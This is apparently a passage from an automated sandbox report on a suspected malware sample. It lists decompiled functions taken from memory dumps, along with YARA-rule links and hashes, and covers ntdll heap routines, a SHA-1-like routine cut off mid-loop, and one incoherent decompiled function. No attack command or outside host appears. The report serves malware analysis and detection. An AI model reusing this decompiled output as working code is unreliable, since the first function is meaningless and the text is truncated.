                                                                                                                                                    Function 0027BF7F, Relevance: 4.2, Strings: 1, Instructions: 2999COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E0027BF7F(signed int __eax, signed char __ebx, signed int __ecx, signed int* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __fp0) {
				signed char _t441;
				signed char _t443;
				signed int _t445;
				signed int _t446;
				intOrPtr* _t449;
				signed char _t450;
				signed char _t451;
				signed char _t458;
				intOrPtr* _t843;
				intOrPtr* _t847;
				signed char _t848;
				signed char _t849;
				signed int _t850;
				void* _t851;
				signed char _t853;
				signed char _t854;
				void* _t855;
				signed char _t856;
				void* _t857;
				signed int _t885;
				intOrPtr* _t1037;
				intOrPtr* _t1041;
				void* _t1042;
				void* _t1054;
				signed char _t1063;
				void* _t1392;

				_t1392 = __fp0;
				_t1041 = __esi;
				_t1037 = __edi;
				_t1002 = __edx;
				_t885 = __ecx;
				_t854 = __ebx;
				_t441 = __eax | 0xffff263a;
				asm("invalid");
				_pop(ss);
				asm("adc [ebx], ecx");
				if(_t441 == 0) {
					 *_t441 =  *_t441 + _t441;
					 *((intOrPtr*)(__ecx + 0x7b750b11)) =  *((intOrPtr*)(__ecx + 0x7b750b11)) + _t1042;
					 *_t441 =  *_t441 + _t441;
					 *((intOrPtr*)(__edi + 0x5d)) =  *((intOrPtr*)(__edi + 0x5d)) + _t1042;
					 *_t441 =  *_t441 + _t441;
					asm("fcom qword [ecx]");
					 *__edx =  *__edx | __ecx;
					_push(es);
					_t847 = (_t441 |  *_t441) -  *(_t441 |  *_t441) -  *((intOrPtr*)((_t441 |  *_t441) -  *(_t441 |  *_t441)));
					 *_t847 =  *_t847 + _t847;
					 *_t847 =  *_t847 + __edx;
					 *_t847 =  *_t847 + _t847;
					_t848 = _t847 +  *_t847;
					asm("insd");
					_t1002 = __edx + __ecx;
					_push(__edi);
					L2:
					 *_t1037 =  *_t1037 + _t1002;
					 *_t848 =  *_t848 + _t848;
					 *_t848 =  *_t848 + _t848;
					asm("adc esi, [eax]");
					_t849 = _t848;
					_push(_t1002);
					 *_t849 =  *_t849 + _t849;
					 *_t1037 =  *_t1037 + _t885;
					 *_t885 =  *_t885 + _t1002;
					 *_t849 =  *_t849 + _t849;
					 *_t849 =  *_t849 + _t849;
					_t850 = _t849 + 0xa;
					ss = es;
					_t885 = _t885 +  *[cs:ebx];
					 *_t850 =  *_t850 & _t850;
					_t854 = _t854 +  *((intOrPtr*)(_t854 - 0x47)) +  *((intOrPtr*)(_t854 +  *((intOrPtr*)(_t854 - 0x47)) - 0x46));
					 *_t850 =  *_t850 + _t850;
					_t851 = _t850 + 0x1f;
					asm("adc [ebp+0x10000ae], cl");
					L3:
					 *0xdcd0 =  *0xdcd0 + _t1054;
					_t853 = _t851 + 0x00000028 ^ 0x6f0a0001;
					 *[ss:eax] =  *[ss:eax] + _t853;
					_t848 = _t853 |  *_t853;
					_t1054 = _t1054 -  *_t848;
					 *_t1002 =  *_t1002 + _t848;
					if( *_t1002 != 0) {
						goto L2;
					}
					 *_t848 =  *_t848 + _t848;
					_t441 = _t848 + 0x1e;
					_t1042 = _t1041 + 0x25010000;
					asm("rcr ch, 1");
					 *_t441 =  *_t441 + _t441;
				}
				_t443 = _t441 + 0x00000028 ^ 0x6f0a0001;
				 *[ss:eax] =  *[ss:eax] + _t443;
				_t445 = (_t443 |  *_t443) -  *(_t443 |  *_t443);
				 *_t1002 =  *_t1002 + _t885;
				while(1) {
					L6:
					 *_t445 =  *_t445 + _t445;
					asm("adc esi, [eax]");
					 *_t445 =  *_t445 + _t445;
					_t446 = _t445;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 | _t446;
					 *_t885 =  *_t885 + _t1002;
					while(1) {
						L7:
						asm("adc [eax], eax");
						_t855 = _t854 +  *((intOrPtr*)(_t854 - 0x48));
						 *_t446 =  *_t446 + _t446;
						_push(es);
						_t449 = _t446 + 0xa -  *((intOrPtr*)(_t446 + 0xa)) -  *_t1041;
						 *_t1002 =  *_t1002 + _t449;
						_t1037 = _t1037 +  *(_t1042 - 0x48);
						 *_t449 =  *_t449 + _t449;
						_t450 = _t449 + 0x2a;
						asm("into");
						 *_t1002 =  *_t1002 + _t450;
						 *_t1002 =  *_t1002 - _t855;
						 *_t450 =  *_t450 + _t450;
						_t451 = _t450 |  *_t450;
						_t856 = _t855 +  *((intOrPtr*)(_t1041 + 0x45));
						_t1063 = _t856;
						L9:
						while(1) {
							if(_t1063 > 0) {
								 *_t451 =  *_t451 + _t451;
								_t856 = _t856 |  *(_t1042 - 0x48);
								 *_t451 =  *_t451 + _t451;
								_t451 = _t451 + 2;
								if(_t451 >= 0) {
									L15:
									 *_t1002 =  *_t1002 + _t885;
									if ( *_t1002 >= 0) goto L9;
								} else {
									 *_t451 =  *_t451 + _t451;
									_t854 = _t856 |  *(_t1042 - 0x46);
									 *_t451 =  *_t451 + _t451;
									_t445 = _t451 + 2;
									if(_t445 != 0) {
										goto L6;
									} else {
										 *_t445 =  *_t445 + _t445;
										_t446 = _t445 + 0x17;
										asm("outsd");
										 *_t1002 =  *_t1002 + _t885;
										 *_t1002 =  *_t1002 + _t446;
										_pop(ss);
										if( *_t1002 >= 0) {
											goto L7;
										} else {
											 *_t446 =  *_t446 + _t446;
											_t843 = _t446 + 0x2a;
											 *_t843 =  *_t843 + _t843;
											asm("adc esi, [eax]");
											_t458 = _t854;
											_t857 = _t843 +  *_t843;
											 *_t458 =  *_t458 + _t458;
											 *_t1037 =  *_t1037 + _t885;
											 *_t885 =  *_t885 + _t1002;
											 *_t1002 =  *_t1002 + _t458;
											 *_t1002 =  *_t1002 - _t857;
											 *_t458 =  *_t458 + _t458;
											_t451 = _t458 |  *_t458;
											_t856 = _t857 +  *((intOrPtr*)(_t1041 + 0x45));
											 *_t451 =  *_t451 + _t451;
											goto L15;
										}
									}
								}
							}
						}
					}
					goto L3;
				}
			}





























                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf7f
                                                                                                                                                    0x0027bf84
                                                                                                                                                    0x0027bf86
                                                                                                                                                    0x0027bf87
                                                                                                                                                    0x0027bf89
                                                                                                                                                    0x0027bf8b
                                                                                                                                                    0x0027bf8d
                                                                                                                                                    0x0027bf94
                                                                                                                                                    0x0027bf96
                                                                                                                                                    0x0027bf99
                                                                                                                                                    0x0027bf9d
                                                                                                                                                    0x0027bf9f
                                                                                                                                                    0x0027bfa3
                                                                                                                                                    0x0027bfa4
                                                                                                                                                    0x0027bfa6
                                                                                                                                                    0x0027bfa8
                                                                                                                                                    0x0027bfaa
                                                                                                                                                    0x0027bfac
                                                                                                                                                    0x0027bfae
                                                                                                                                                    0x0027bfaf
                                                                                                                                                    0x0027bfb1
                                                                                                                                                    0x0027bfb2
                                                                                                                                                    0x0027bfb2
                                                                                                                                                    0x0027bfb4
                                                                                                                                                    0x0027bfb6
                                                                                                                                                    0x0027bfb8
                                                                                                                                                    0x0027bfba
                                                                                                                                                    0x0027bfbc
                                                                                                                                                    0x0027bfbd
                                                                                                                                                    0x0027bfbf
                                                                                                                                                    0x0027bfc2
                                                                                                                                                    0x0027bfc4
                                                                                                                                                    0x0027bfc9
                                                                                                                                                    0x0027bfcb
                                                                                                                                                    0x0027bfce
                                                                                                                                                    0x0027bfcf
                                                                                                                                                    0x0027bfd2
                                                                                                                                                    0x0027bfd4
                                                                                                                                                    0x0027bfd7
                                                                                                                                                    0x0027bfd9
                                                                                                                                                    0x0027bfdb
                                                                                                                                                    0x0027bfe0
                                                                                                                                                    0x0027bfe0
                                                                                                                                                    0x0027bfe8
                                                                                                                                                    0x0027bfed
                                                                                                                                                    0x0027bff0
                                                                                                                                                    0x0027bff2
                                                                                                                                                    0x0027bff4
                                                                                                                                                    0x0027bff6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027bff8
                                                                                                                                                    0x0027bffa
                                                                                                                                                    0x0027bffc
                                                                                                                                                    0x0027c002
                                                                                                                                                    0x0027c004
                                                                                                                                                    0x0027c004
                                                                                                                                                    0x0027c008
                                                                                                                                                    0x0027c00d
                                                                                                                                                    0x0027c012
                                                                                                                                                    0x0027c014
                                                                                                                                                    0x0027c016
                                                                                                                                                    0x0027c016
                                                                                                                                                    0x0027c016
                                                                                                                                                    0x0027c018
                                                                                                                                                    0x0027c01a
                                                                                                                                                    0x0027c01c
                                                                                                                                                    0x0027c01e
                                                                                                                                                    0x0027c020
                                                                                                                                                    0x0027c022
                                                                                                                                                    0x0027c023
                                                                                                                                                    0x0027c023
                                                                                                                                                    0x0027c023
                                                                                                                                                    0x0027c025
                                                                                                                                                    0x0027c028
                                                                                                                                                    0x0027c02e
                                                                                                                                                    0x0027c02f
                                                                                                                                                    0x0027c031
                                                                                                                                                    0x0027c033
                                                                                                                                                    0x0027c036
                                                                                                                                                    0x0027c038
                                                                                                                                                    0x0027c03a
                                                                                                                                                    0x0027c03b
                                                                                                                                                    0x0027c03d
                                                                                                                                                    0x0027c03f
                                                                                                                                                    0x0027c041
                                                                                                                                                    0x0027c043
                                                                                                                                                    0x0027c043
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c044
                                                                                                                                                    0x0027c044
                                                                                                                                                    0x0027c046
                                                                                                                                                    0x0027c048
                                                                                                                                                    0x0027c04b
                                                                                                                                                    0x0027c04d
                                                                                                                                                    0x0027c04f
                                                                                                                                                    0x0027c088
                                                                                                                                                    0x0027c088
                                                                                                                                                    0x0027c08a
                                                                                                                                                    0x0027c051
                                                                                                                                                    0x0027c051
                                                                                                                                                    0x0027c053
                                                                                                                                                    0x0027c056
                                                                                                                                                    0x0027c058
                                                                                                                                                    0x0027c05a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c05c
                                                                                                                                                    0x0027c05c
                                                                                                                                                    0x0027c05e
                                                                                                                                                    0x0027c060
                                                                                                                                                    0x0027c063
                                                                                                                                                    0x0027c065
                                                                                                                                                    0x0027c067
                                                                                                                                                    0x0027c068
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c06a
                                                                                                                                                    0x0027c06a
                                                                                                                                                    0x0027c06c
                                                                                                                                                    0x0027c06e
                                                                                                                                                    0x0027c070
                                                                                                                                                    0x0027c074
                                                                                                                                                    0x0027c074
                                                                                                                                                    0x0027c075
                                                                                                                                                    0x0027c077
                                                                                                                                                    0x0027c07a
                                                                                                                                                    0x0027c07c
                                                                                                                                                    0x0027c07e
                                                                                                                                                    0x0027c080
                                                                                                                                                    0x0027c082
                                                                                                                                                    0x0027c084
                                                                                                                                                    0x0027c087
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c087
                                                                                                                                                    0x0027c068
                                                                                                                                                    0x0027c05a
                                                                                                                                                    0x0027c04f
                                                                                                                                                    0x0027c08b
                                                                                                                                                    0x0027c044
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c023

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243172465.0000000000272000.00000020.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243165092.0000000000270000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243237553.0000000000320000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: athan
                                                                                                                                                    • API String ID: 0-369431050
                                                                                                                                                    • Opcode ID: af50e787f93ea5336b5c0ea21d47c5584112e4cc5d717b16913e89f4ab765763
                                                                                                                                                    • Instruction ID: 6e757d670470ffaefd1b0e3e2b167f4f2005c71fa52c45176bd29b71bfb57679
                                                                                                                                                    • Opcode Fuzzy Hash: af50e787f93ea5336b5c0ea21d47c5584112e4cc5d717b16913e89f4ab765763
                                                                                                                                                    • Instruction Fuzzy Hash: CF433B6140E7C29FCB434BB85C712E1BFB4AE5722431E49DBC4C08F4A3D229696AD776
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C963DB, Relevance: 4.1, Strings: 3, Instructions: 340COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00CC9636
                                                                                                                                                    • HEAP: , xrefs: 00CC9623
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CC9616
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                                                                    • API String ID: 0-385592399
                                                                                                                                                    • Opcode ID: c75493c8c3f9f8d825cd3baa9e3c7a0b43d1ef813c66c038e006d723bb1ba99a
                                                                                                                                                    • Instruction ID: dad1eb5703749a7cb7d68434e7cf6e193bca275477fc46304549381006263b3b
                                                                                                                                                    • Opcode Fuzzy Hash: c75493c8c3f9f8d825cd3baa9e3c7a0b43d1ef813c66c038e006d723bb1ba99a
                                                                                                                                                    • Instruction Fuzzy Hash: 78D1CD71A00656DFCF15CFA9C588BBAB7F0FB08300F258199E5659B285D730EE01EB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C81489, Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00CD2D1F
                                                                                                                                                    • HEAP: , xrefs: 00CD2D14
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CD2D07
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                    • API String ID: 0-1596344177
                                                                                                                                                    • Opcode ID: 3560b0b02d9bf1572a9db8de336db084633405657c25bb8c9971899240cf29fb
                                                                                                                                                    • Instruction ID: 5d39645debfb03e91c1c60fc55a28632cbbee453688ef898fab4b2f54d18e9ce
                                                                                                                                                    • Opcode Fuzzy Hash: 3560b0b02d9bf1572a9db8de336db084633405657c25bb8c9971899240cf29fb
                                                                                                                                                    • Instruction Fuzzy Hash: F3B1B171600646CFCB28DF29C484A79B7F1FF89314B158669E8668F782D730EE81DB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CF579A, Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • Heap block at %p modified at %p past requested size of %lx, xrefs: 00CF58F7
                                                                                                                                                    • HEAP: , xrefs: 00CF58E4
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CF58D7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                                                                    • API String ID: 0-3722492067
                                                                                                                                                    • Opcode ID: b55d82d100c22ba2fa316655785a6bd5ba22f239bbf480bcf9db59a27b81d3b7
                                                                                                                                                    • Instruction ID: a0579e40b123cd9d4f7ac364984fb224e2d5ec15ddb66d3b04429b4029d78c5f
                                                                                                                                                    • Opcode Fuzzy Hash: b55d82d100c22ba2fa316655785a6bd5ba22f239bbf480bcf9db59a27b81d3b7
                                                                                                                                                    • Instruction Fuzzy Hash: 45411334250918DBC3A49F1AC844AB277E0EF05790B954859FBD5CF2C1D631DD46EB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CAD47D, Relevance: 2.4, Strings: 1, Instructions: 1138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-3916222277
                                                                                                                                                    • Opcode ID: 61eb376726aa89b944b11d71a37e6421ebd67d68203299846089d692679078d8
                                                                                                                                                    • Instruction ID: f5a2f042bca89bdae33f63e3ba6e03852c8a7c24170844151c9a974160120608
                                                                                                                                                    • Opcode Fuzzy Hash: 61eb376726aa89b944b11d71a37e6421ebd67d68203299846089d692679078d8
                                                                                                                                                    • Instruction Fuzzy Hash: 97A2587290026A9FEF318F54CC81BEAB7B5AB05304F1440EAE55EA3651DB709EC8DF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C869FE, Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8@8
                                                                                                                                                    • API String ID: 0-222468769
                                                                                                                                                    • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                                                                                                                    • Instruction ID: 06ea78f4608c025668a451d5770c73d112d63a3e4e90c24483a6f34462982917
                                                                                                                                                    • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                                                                                                                    • Instruction Fuzzy Hash: BAF18E71A00219AFDF15DFA4C880BAEBBB4EF04708F14845AF855EB291D375DE81DB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408C5B, Relevance: 1.7, Strings: 1, Instructions: 425COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00408C5B(void* __eax, void* __ebx, void* __ecx, void* __esi, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t280;
				signed int* _t281;
				signed int _t282;
				signed int _t288;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t302;
				signed int _t306;
				signed int _t308;
				signed int _t314;
				void* _t316;
				signed int _t323;
				signed int _t325;
				signed int _t328;
				signed int _t330;
				signed int _t339;
				signed int _t345;
				signed int _t346;
				signed int _t351;
				signed int _t361;
				signed int _t365;
				signed int _t366;
				signed int _t370;
				signed int _t373;
				signed int _t377;
				signed int _t378;
				signed int _t407;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t428;
				signed int _t431;
				signed int _t440;
				signed int _t442;
				signed int _t445;
				signed int _t453;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t479;
				signed int _t487;
				signed int _t488;
				signed int* _t489;
				signed int* _t492;
				signed int _t499;
				signed int _t502;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				signed int _t516;
				signed int _t517;
				signed int _t521;
				signed int _t533;
				signed int _t536;
				signed int _t543;
				void* _t549;
				void* _t551;

				_t316 = __ebx + 1;
				_t549 = _t551;
				_push(_t316);
				_t492 = _a4;
				_t361 = 0;
				_t3 =  &(_t492[7]); // 0x1b
				_t280 = _t3;
				do {
					 *(_t549 + _t361 * 4 - 0x14c) = ((( *(_t280 - 1) & 0x000000ff) << 0x00000008 |  *_t280 & 0x000000ff) << 0x00000008 | _t280[1] & 0x000000ff) << 0x00000008 | _t280[2] & 0x000000ff;
					 *(_t549 + _t361 * 4 - 0x148) = (((_t280[3] & 0x000000ff) << 0x00000008 | _t280[4] & 0x000000ff) << 0x00000008 | _t280[5] & 0x000000ff) << 0x00000008 | _t280[6] & 0x000000ff;
					 *(_t549 + _t361 * 4 - 0x144) = (((_t280[7] & 0x000000ff) << 0x00000008 | _t280[8] & 0x000000ff) << 0x00000008 | _t280[9] & 0x000000ff) << 0x00000008 | _t280[0xa] & 0x000000ff;
					 *(_t549 + _t361 * 4 - 0x140) = (((_t280[0xb] & 0x000000ff) << 0x00000008 | _t280[0xc] & 0x000000ff) << 0x00000008 | _t280[0xd] & 0x000000ff) << 0x00000008 | _t280[0xe] & 0x000000ff;
					_t361 = _t361 + 4;
					_t280 =  &(_t280[0x10]);
				} while (_t361 < 0x10);
				_t281 =  &_v304;
				_v8 = 0x10;
				do {
					_t407 =  *(_t281 - 0x18);
					_t468 =  *(_t281 - 0x14);
					_t365 =  *(_t281 - 0x20) ^ _t281[5] ^  *_t281 ^ _t407;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t281[9] =  *(_t281 - 0x1c) ^ _t281[6] ^ _t281[1] ^ _t468;
					_t281[8] = _t365;
					_t323 = _t281[7] ^  *(_t281 - 0x10) ^ _t281[2];
					_t281 =  &(_t281[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t47 =  &_v8;
					 *_t47 = _v8 - 1;
					_t281[6] = _t323 ^ _t407;
					_t281[7] =  *(_t281 - 0x1c) ^  *(_t281 - 4) ^ _t365 ^ _t468;
				} while ( *_t47 != 0);
				_t325 =  *_t492;
				_t282 = _t492[1];
				_t366 = _t492[2];
				_t412 = _t492[3];
				_v12 = _t325;
				_v16 = _t492[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t471 = _v8;
					_t499 = _t325 + ( !_t282 & _t412 | _t366 & _t282) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t328 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t412;
					_v12 = _t499;
					asm("rol esi, 0x5");
					_v8 = _t366;
					_t418 = _t499 + ( !_t328 & _t366 | _t282 & _t328) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t502 = _t282;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t370 = _v12;
					_v8 = _t328;
					_t330 = _v8;
					_v12 = _t418;
					asm("rol edx, 0x5");
					_t288 = _t418 + ( !_t370 & _t502 | _t328 & _t370) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t421 = _v12;
					_v16 = _t502;
					asm("ror ecx, 0x2");
					_v8 = _t370;
					_v12 = _t288;
					asm("rol eax, 0x5");
					_v16 = _t330;
					_t507 = _t288 + ( !_t421 & _t330 | _t370 & _t421) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t366 = _v12;
					_t291 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t421;
					_v12 = _t507;
					asm("rol esi, 0x5");
					_v16 = _t291;
					_t282 = _v12;
					_t510 = _t507 + ( !_t366 & _t291 | _t421 & _t366) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t412 = _v8;
					asm("ror ecx, 0x2");
					_t472 = _t471 + 5;
					_t325 = _t510;
					_v12 = _t325;
					_v8 = _t472;
				} while (_t472 < 0x14);
				_t473 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t412;
					_t513 = _t510 + (_t412 ^ _t366 ^ _t282) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t339 = _v12;
					_v12 = _t513;
					asm("rol esi, 0x5");
					_t428 = _t513 + (_t366 ^ _t282 ^ _t339) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t516 = _t282;
					_v16 = _t366;
					_t373 = _v12;
					_v12 = _t428;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t295 = _t428 + (_t282 ^ _t339 ^ _t373) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t431 = _v12;
					_v8 = _t339;
					_v8 = _t373;
					_v12 = _t295;
					asm("rol eax, 0x5");
					_t473 = _t473 + 5;
					_t366 = _v12;
					asm("ror edx, 0x2");
					_t147 = _t516 + 0x6ed9eba1; // 0x6ed9eb9f
					_t517 = _t295 + (_t339 ^ _v8 ^ _t431) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x154)) + _t147;
					_t298 = _v8;
					_v8 = _t431;
					_v12 = _t517;
					asm("rol esi, 0x5");
					_t412 = _v8;
					_t510 = _t517 + (_t298 ^ _v8 ^ _t366) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x150)) + _t339 + 0x6ed9eba1;
					_v16 = _t298;
					_t282 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t510;
				} while (_t473 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t412;
					asm("ror eax, 0x2");
					_t521 = ((_t366 | _t282) & _t412 | _t366 & _t282) +  *((intOrPtr*)(_t549 + _v8 * 4 - 0x14c)) + _t510 + _v16 - 0x70e44324;
					_t479 = _v12;
					_v12 = _t521;
